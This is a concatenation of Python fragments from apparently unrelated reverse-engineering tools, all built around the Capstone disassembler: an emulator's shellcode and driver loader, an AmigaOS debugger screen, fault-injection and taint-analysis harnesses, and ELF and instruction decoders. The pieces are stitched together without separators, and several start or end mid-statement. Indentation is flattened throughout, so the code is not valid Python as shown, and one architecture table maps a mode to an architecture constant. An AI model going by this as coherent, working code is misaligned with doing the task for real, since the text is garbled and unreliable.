def load_shellcode(self, path, arch, data=None): """ Load position independent code (i.e. shellcode) to prepare for emulation """ sc_hash = None if arch == 'x86': arch = _arch.ARCH_X86 elif arch in ('x64', 'amd64'): arch = _arch.ARCH_AMD64 self.arch = arch if data: sc_hash = hashlib.sha256() sc_hash.update(data) sc_hash = sc_hash.hexdigest() sc = data else: with open(path, 'rb') as scpath: sc = scpath.read() sc_hash = hashlib.sha256() sc_hash.update(sc) sc_hash = sc_hash.hexdigest() if self.arch == _arch.ARCH_X86: disasm_mode = cs.CS_MODE_32 elif self.arch == _arch.ARCH_AMD64: disasm_mode = cs.CS_MODE_64 else: raise Win32EmuError('Unsupported architecture: %s' % self.arch) self.emu_eng.init_engine(_arch.ARCH_X86, self.arch) if not self.disasm_eng: self.disasm_eng = cs.Cs(cs.CS_ARCH_X86, disasm_mode) sc_tag = 'emu.shellcode.%s' % (sc_hash) # Map the shellcode into memory sc_addr = self.mem_map(len(sc), tag=sc_tag) self.mem_write(sc_addr, sc) self.pic_buffers.append((path, sc_addr, len(sc))) sc_arch = 'unknown' if arch == _arch.ARCH_AMD64: sc_arch = 'x64' elif arch == _arch.ARCH_X86: sc_arch = 'x86' if self.profiler: self.input = { 'path': path, 'sha256': sc_hash, 'size': len(sc), 'arch': sc_arch, 'mem_tag': sc_tag, 'emu_version': self.get_emu_version(), 'os_run': self.get_osver_string() } self.profiler.add_input_metadata(self.input) # Strings the initial buffer so that we can detect decoded strings later on if self.do_strings: self.profiler.strings['ansi'] = self.get_ansi_strings(sc) self.profiler.strings['unicode'] = self.get_unicode_strings(sc) self.setup() return sc_addr
def load_module(self, path=None, data=None): """ Load the kernel module to be emulated """ pe = self.load_pe(path, data=data, imp_id=w32common.IMPORT_HOOK_ADDR) if pe.arch == _arch.ARCH_X86: disasm_mode = cs.CS_MODE_32 elif pe.arch == _arch.ARCH_AMD64: disasm_mode = cs.CS_MODE_64 else: raise KernelEmuError('Unsupported architecture: %s', pe.arch) if not self.arch: self.arch = pe.arch self.set_ptr_size(self.arch) self.emu_eng.init_engine(_arch.ARCH_X86, pe.arch) if not self.disasm_eng: self.disasm_eng = cs.Cs(cs.CS_ARCH_X86, disasm_mode) self.api = WindowsApi(self) self.om = objman.ObjectManager(emu=self) if not data: file_name = os.path.basename(path) mod_name = os.path.splitext(file_name)[0] else: drv_hash = hashlib.sha256() drv_hash.update(data) drv_hash = drv_hash.hexdigest() mod_name = drv_hash file_name = '%s.sys' % (mod_name) emu_path = '%sdrivers\\%s' % (self.get_system_root(), file_name) pe.emu_path = emu_path self.map_pe(pe, mod_name=mod_name, emu_path=emu_path) self.mem_write(pe.base, pe.mapped_image) # Strings the initial buffer so that we can detect decoded strings later on if self.profiler and self.do_strings: astrs = self.get_ansi_strings(pe.mapped_image) wstrs = self.get_unicode_strings(pe.mapped_image) for s in astrs: if s not in self.profiler.strings['ansi']: self.profiler.strings['ansi'].append(s) for s in wstrs: if s not in self.profiler.strings['unicode']: self.profiler.strings['unicode'].append(s) # Init imported data for addr, imp in pe.imports.items(): mn, fn = imp mod, eh = self.api.get_data_export_handler(mn, fn) if eh: data_ptr = self.handle_import_data(mn, fn) sym = "%s.%s" % (mn, fn) self.global_data.update({addr: [sym, data_ptr]}) self.mem_write( addr, data_ptr.to_bytes(self.get_ptr_size(), 'little')) # Set the emulator to run in protected mode self._setup_gdt(self.get_arch()) self.setup_kernel_mode() self.setup_user_shared_data() if not self.stack_base: self.stack_base, stack_ptr = self.alloc_stack(pe.stack_commit) return pe
def __init__(self, verbose: bool, server_conn: ServerConnection): def _handle_global_input(key: str): if key == 'f5': self._input_view.set_edit_text('cont') self._input_view.keypress(0, 'enter') elif key == 'f8': self._input_view.set_edit_text('step') self._input_view.keypress(0, 'enter') elif key == 'f10': self._input_view.set_edit_text('quit') self._input_view.keypress(0, 'enter') else: logger.error(f"Function key '{key}' not implemented") self._source_view = Text("Source code will be shown here...") source_widget = LineBox( Padding(Filler(Pile([ Text(('banner', "Source code"), align='center'), self._source_view ]), valign='top', top=1, bottom=1), left=1, right=1)) self._disasm_view = Text("Dissambled code will be shown here...") disasm_widget = LineBox( Padding(Filler(Pile([ Text(('banner', "Disassembled code"), align='center'), self._disasm_view ]), valign='top', top=1, bottom=1), left=1, right=1)) self._register_view = Text("Registers will be shown here...") register_widget = LineBox( Padding(Filler(Pile([ Text(('banner', "Registers"), align='center'), self._register_view ]), valign='top', top=1, bottom=1), left=1, right=1)) self._stack_view = Text("Stack will be shown here...") stack_widget = LineBox( Padding(Filler(Pile( [Text(('banner', "Stack"), align='center'), self._stack_view]), valign='top', top=1, bottom=1), left=1, right=1)) self._input_view = CommandInput(self, server_conn) input_widget = LineBox( Padding(Filler( self._input_view, valign='top', ), left=1, right=1)) self._log_view = Text("Log messages will be shown here...") log_widget = LineBox( Padding(Filler( self._log_view, valign='top', ), left=1, right=1)) title = AttrMap( Text("CWDebug - a source-level debugger for the AmigaOS", align='center'), 'banner') menu = AttrMap( Text("F5 = Continue, F8 = Single-step over, F10 = Quit"), 'banner') screen = Frame( header=title, body=Pile([ Columns([ Pile([source_widget, disasm_widget]), Pile([register_widget, stack_widget]) ]), # 2 needs to be added for the line box (INPUT_WIDGET_HEIGHT + 2, input_widget), (MAX_NUM_OF_LOG_MESSAGES + 2, log_widget) ]), footer=menu) logger.remove() logger.add(UrwidHandler(self._log_view)) logger.info("Created main screen, starting event loop") self._disassembler = capstone.Cs(capstone.CS_ARCH_M68K, capstone.CS_MODE_32) loop = MainLoop(screen, PALETTE, unhandled_input=_handle_global_input) loop.run()
tqdm.write(str((data, exception))) if __name__ == "__main__": if len(sys.argv) != 2 or sys.argv[1] not in [ 'simple', 'snapshot', 'snapshotmulti' ]: print(f'Usage: python3 {sys.argv[0]} [simple|snapshot|snapshotmulti]') sys.exit(1) ARCH = capstone.CS_ARCH_ARM MODE = capstone.CS_MODE_ARM NRUNS = 1000 md = capstone.Cs(ARCH, MODE) addr = 0x102f8 #4#ec#0x102f8 # arguments for fi_model fi_args = {'addr': addr, 'ins': b'\x00' * 4} ql = QilingFi( # Qiling args ["ifelse/ifelse"], ".", console=console, stdin=StringBuffer(), stdout=StringBuffer(), # QilingFi args
if len(sys.argv) > 1: filename = sys.argv[1] else: filename = '0.elf' elf = ELFFile(open(filename)) mm = MmapManager() for seg in elf.iter_segments(): if seg['p_type'] == 'PT_LOAD': mm.memmap(seg['p_vaddr'], seg.data()) entry = elf['e_entry'] da = Disasmer(mm, cs.Cs(cs.CS_ARCH_X86, cs.CS_MODE_64)) # determine main function start_il = da.disasm_until(entry, BasicBlockEndOrCallCondition()) for i in start_il: if i.mnemonic == 'mov' and 'rdi' in i.op_str: main_addr = int(i.op_str.split()[-1], 0) print 'main found' if i.mnemonic == 'mov' and 'rcx' in i.op_str: init_addr = int(i.op_str.split()[-1], 0) print 'init found' # else: # print 'cannot find main address' # exit() print 'main address', hex(main_addr) #print_il(da.disasm_until(entry, until_call))
def decode(self, address, code): # Get the constants for the requested architecture. arch, mode = self.__constants[self.arch] # Get the decoder function outside the loop. md = capstone.Cs(arch, mode) decoder = md.disasm_lite # If the buggy version of the bindings are being used, we need to catch # all exceptions broadly. If not, we only need to catch CsError. if self.__bug: CsError = Exception else: CsError = capstone.CsError # Create the variables for the instruction length, mnemonic and # operands. That way they won't be created within the loop, # minimizing the chances data might be overwritten. # This only makes sense for the buggy vesion of the bindings, normally # memory accesses are safe). length = mnemonic = op_str = None # For each instruction... result = [] offset = 0 while offset < len(code): # Disassemble a single instruction, because disassembling multiple # instructions may cause excessive memory usage (Capstone allocates # approximately 1K of metadata per each decoded instruction). instr = None try: instr = list( decoder(code[offset:offset + 16], address + offset, 1))[0] except IndexError: pass # No instructions decoded. except CsError: pass # Any other error. # On success add the decoded instruction. if instr is not None: # Get the instruction length, mnemonic and operands. # Copy the values quickly before someone overwrites them, # if using the buggy version of the bindings (otherwise it's # irrelevant in which order we access the properties). length = instr[1] mnemonic = instr[2] op_str = instr[3] # Concatenate the mnemonic and the operands. if op_str: disasm = "%s %s" % (mnemonic, op_str) else: disasm = mnemonic # Get the instruction bytes as a hexadecimal dump. hexdump = HexDump.hexadecimal(code[offset:offset + length]) # On error add a "define constant" instruction. # The exact instruction depends on the architecture. else: # The number of bytes to skip depends on the architecture. # On Intel processors we'll skip one byte, since we can't # really know the instruction length. On the rest of the # architectures we always know the instruction length. if self.arch in (win32.ARCH_I386, win32.ARCH_AMD64): length = 1 else: length = 4 # Get the skipped bytes as a hexadecimal dump. skipped = code[offset:offset + length] hexdump = HexDump.hexadecimal(skipped) # Build the "define constant" instruction. # On Intel processors it's "db". # On ARM processors it's "dcb". if self.arch in (win32.ARCH_I386, win32.ARCH_AMD64): mnemonic = "db " else: mnemonic = "dcb " bytes = [] for b in skipped: if chr(b).isalpha(): bytes.append("'%s'" % chr(b)) else: bytes.append("0x%x" % b) op_str = ", ".join(bytes) disasm = mnemonic + op_str # Add the decoded instruction to the list. result.append(( address + offset, length, disasm, hexdump, )) # Update the offset. offset += length # Return the list of decoded instructions. return result
'ldr_bm2r0': [0xe5, 0x1f, 0x00, 0x10], 'eor_r0_r1': [0xe0, 0x21, 0x00, 0x00], 'str_bm2r0': [0xe5, 0x0f, 0x00, 0x18], 'b_back': [0xea, 0x00, 0x00, 0x00], } intr_stub = { 'push': [0xe9, 0x2d, 0x00, 0x0e], 'ldr_id2r1': [0xe5, 0x9f, 0x10, 0x08], 'b_bb_stub': [0xea, 0x00, 0x00, 0x00], 'pop': [0xe8, 0xbd, 0x00, 0x0e], 'b_back': [0xea, 0x00, 0x00, 0x00], 'id': [0x00, 0x00, 0x00, 0x00] } md = caps.Cs(caps.CS_ARCH_ARM, caps.CS_MODE_ARM) prog = None with open(sys.argv[1], 'rb') as fd: prog = bytearray(fd.read()) print("bm_addr: %x" % bm_addr) prog.extend(set_bb_stub['bm0'][::-1]) prog.extend(set_bb_stub['bm1'][::-1]) prog.extend(set_bb_stub[''][::-1]) prog.extend([0] * 4) last_addr = len(prog) + 1 bbdict = pickle.load(open(sys.argv[2], 'rb'))
def __init__(self, filename, raw_type, raw_base, raw_big_endian, database): import capstone as CAPSTONE arch_lookup = { "x86": CAPSTONE.CS_ARCH_X86, "x64": CAPSTONE.CS_ARCH_X86, "ARM": CAPSTONE.CS_ARCH_ARM, "MIPS32": CAPSTONE.CS_ARCH_MIPS, "MIPS64": CAPSTONE.CS_ARCH_MIPS, } mode_lookup = { "x86": CAPSTONE.CS_MODE_32, "x64": CAPSTONE.CS_MODE_64, "ARM": CAPSTONE.CS_ARCH_ARM, "MIPS32": CAPSTONE.CS_MODE_MIPS32, "MIPS64": CAPSTONE.CS_MODE_MIPS64, } word_size_lookup = { "x86": 4, "x64": 8, "ARM": 4, "MIPS32": 4, "MIPS64": 8, } self.capstone_inst = {} # capstone instruction cache self.db = database if database.loaded: self.mem = database.mem else: self.mem = Memory() database.mem = self.mem self.instanciate_binary(filename, raw_type, raw_base, raw_big_endian) if self.binary.arch not in ("x86", "x64", "MIPS32", "MIPS64", "ARM"): raise ExcArch(self.binary.arch) self.wordsize = word_size_lookup.get(self.binary.arch, None) self.binary.wordsize = self.wordsize self.is_mips = self.binary.arch in ("MIPS32", "MIPS64") self.is_x86 = self.binary.arch in ("x86", "x64") self.is_arm = self.binary.arch in ("ARM") self.is_big_endian = self.binary.is_big_endian() self.binary.load_section_names() self.jmptables = database.jmptables self.user_inline_comments = database.user_inline_comments self.internal_inline_comments = database.internal_inline_comments self.user_previous_comments = database.user_previous_comments self.internal_previous_comments = database.internal_previous_comments self.functions = database.functions self.func_id = database.func_id self.end_functions = database.end_functions self.xrefs = database.xrefs self.mem.xrefs = database.xrefs self.mem.data_sub_xrefs = database.data_sub_xrefs self.mips_gp = database.mips_gp if not database.loaded: self.load_symbols() database.symbols = self.binary.symbols database.reverse_symbols = self.binary.reverse_symbols database.demangled = self.binary.demangled database.reverse_demangled = self.binary.reverse_demangled database.imports = self.binary.imports else: self.binary.symbols = database.symbols self.binary.reverse_symbols = database.reverse_symbols self.binary.demangled = database.demangled self.binary.reverse_demangled = database.reverse_demangled self.binary.imports = database.imports cs_arch = arch_lookup.get(self.binary.arch, None) cs_mode = mode_lookup.get(self.binary.arch, None) if self.is_big_endian: cs_mode |= CAPSTONE.CS_MODE_BIG_ENDIAN else: cs_mode |= CAPSTONE.CS_MODE_LITTLE_ENDIAN self.capstone = CAPSTONE self.md = CAPSTONE.Cs(cs_arch, cs_mode) self.md.detail = True for s in self.binary.iter_sections(): s.big_endian = cs_mode & CAPSTONE.CS_MODE_BIG_ENDIAN
try: import capstone except ImportError as e: capstone = None import pytest import windows.native_exec.simple_x64 as x64 from windows.native_exec.simple_x64 import * del Test # Prevent pytest warning from windows.pycompat import int_types if capstone: disassembleur = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_64) disassembleur.detail = True @pytest.fixture def need_capstone(): if capstone is None: raise pytest.skip("Capstone is not installed") return True pytestmark = pytest.mark.usefixtures("need_capstone") def disas(x): return list(disassembleur.disasm(x, 0)) mnemonic_name_exception = {'movabs': 'mov'}
def __init__(self, arch_str, bytestring): """Initialize wrapper over Capstone CsInsn or Cs. arch_str (str) - the architecture of the instruction (currently supported: X86, AMD64) bytestring (str) - the hex string corresponding to the instruction bytes """ self.archstring = arch_str if arch_str == 'X86': self.arch = isa.x86.X86() insn_info_ct = x86_insn_info_ct elif arch_str == 'AMD64': self.arch = isa.amd64.AMD64() insn_info_ct = amd64_insn_info_ct elif arch_str == 'ARM64': self.arch = isa.arm64.ARM64() else: raise UnsupportedArchException() self.bytestring = bytestring self.bytecode = bytestring.decode('hex') cs = capstone.Cs(self.arch.cs_arch[0], self.arch.cs_arch[1]) cs.detail = True try: cs_insn_info = next(cs.disasm(self.bytecode, 0x1000)) except: traceback.print_exc() raise ParseInsnException() self.asm_str = "{}\t{}".format(cs_insn_info.mnemonic, cs_insn_info.op_str) print('Disassembling instruction: {}'.format(self.asm_str)) # capstone register set self.cs_reg_set = [] # register set based on manually defined information in # arm64/x86_constaints.py self.manual_reg_set = [] # REGISTERS # get register set based on capstone # based on cs, regs_access includes all explicit & implicit registers regs_read, regs_write = cs_insn_info.regs_access() for reg in regs_read: reg_name = cs_insn_info.reg_name(reg) self.cs_reg_set.append(self.arch.create_full_reg(reg_name)) for reg in regs_write: reg_name = cs_insn_info.reg_name(reg) self.cs_reg_set.append(self.arch.create_full_reg(reg_name)) # we don't f**k around with FPSW cause unicorn can't write stuff in it for reg in self.cs_reg_set: if reg.name == 'FPSW': self.cs_reg_set.remove(reg) # MEMORY - Capstone # check memory operands and add Register objects for memory write & # reads #read = 1 #if cs_insn_info.id in insn_info_ct.mem_override: # for access_type, size in insn_info_ct.mem_override[cs_insn_info.id]: # if access_type == 'r': # name = 'MEM_READ{}'.format(read) # read += 1 # elif access_type == 'w': # name = 'MEM_WRITE1' # else: # pdb.set_trace() # bits = size*8 # self.cs_reg_set.append(self.arch.create_full_reg(name, bits)) #else: # for operand in cs_insn_info.operands: # if operand.type == capstone.CS_OP_MEM and cs_insn_info.id not in insn_info_ct.remove_mem: # name = '' # if operand.access & capstone.CS_AC_READ: # name = 'MEM_READ{}'.format(read) # read += 1 # bits = self._get_mem_bits(operand, regs_write) # self.cs_reg_set.append(self.arch.create_full_reg(name, bits)) # if operand.access & capstone.CS_AC_WRITE: # name = 'MEM_WRITE1' # bits = self._get_mem_bits(operand, regs_read) # self.cs_reg_set.append(self.arch.create_full_reg(name, bits)) # if not name: # print("Memory operand is neither READ nor WRITE") # pdb.set_trace() # read = 1 # if cs_insn_info.id in insn_info_ct.implicit_regs: # manual_info = insn_info_ct.implicit_regs[cs_insn_info.id] # for _, _, reg_name in manual_info: # self.manual_reg_set.append(self.arch.create_full_reg(reg_name)) # if cs_insn_info.id in insn_info_ct.implicit_mem: # # XXX i think this should be a list but it seems like there's # # only one type of memory access in x86_insn_info_ct.py # (access, size) = insn_info_ct.implicit_mem[cs_insn_info.id] # if 'w' in access: # name = 'MEM_WRITE1' # elif 'r' in access: # name = 'MEM_READ{}'.format(read) # read += 1 # bits, structure = self._set_mem_reg_structure(size) # mem_reg = self.arch.create_full_reg(name, bits, structure) # self.cs_reg_set.append(mem_reg) #print('cs reg set {}'.format(self.cs_reg_set)) #print('manual reg set {}'.format(self.manual_reg_set)) reg_set = sorted(list(set(self.cs_reg_set + self.manual_reg_set))) self.insninfo = InsnInfo(arch_str, bytestring, reg_set, self.arch.cond_reg)
10) # Taint R2 with label 10. Should prop into R1 @panda.cb_insn_translate def should_run_on_insn(env, pc): ''' At each basic block, decide if we run on_insn for each contained instruction. For now, always return True unless we're past stop_addr Alternatively could be implemented as panda.cb_insn_translate(lambda x,y: True) ''' return True md = capstone.Cs(capstone.CS_ARCH_ARM, capstone.CS_MODE_ARM) @panda.cb_insn_exec def on_insn(cpu, pc): ''' At each instruction, print capstone disassembly. When we reach stop_addr, dump registers and shutdown ''' if pc == stop_addr: print("Finished execution. CPU registers are:") panda.arch.dump_regs(cpu) print("Taint results\n") if panda.taint_check_reg(panda.arch.registers['R1']): for idx, byte_taint in enumerate(
print("Machine state initialized") @panda.cb_insn_translate def should_run_on_insn(env, pc): ''' At each basic block, decide if we run on_insn for each contained instruction. For now, always return True unless we're past stop_addr Alternatively could be implemented as panda.cb_insn_translate(lambda x,y: True) ''' return True md = capstone.Cs(capstone.CS_ARCH_PPC, capstone.CS_MODE_32) @panda.cb_insn_exec def on_insn(cpu, pc): ''' At each instruction, print capstone disassembly. When we reach stop_addr, dump registers and shutdown ''' print("Insn!") if pc == stop_addr: print("Finished execution. CPU registers are:") d() ''' dump_regs(panda, cpu)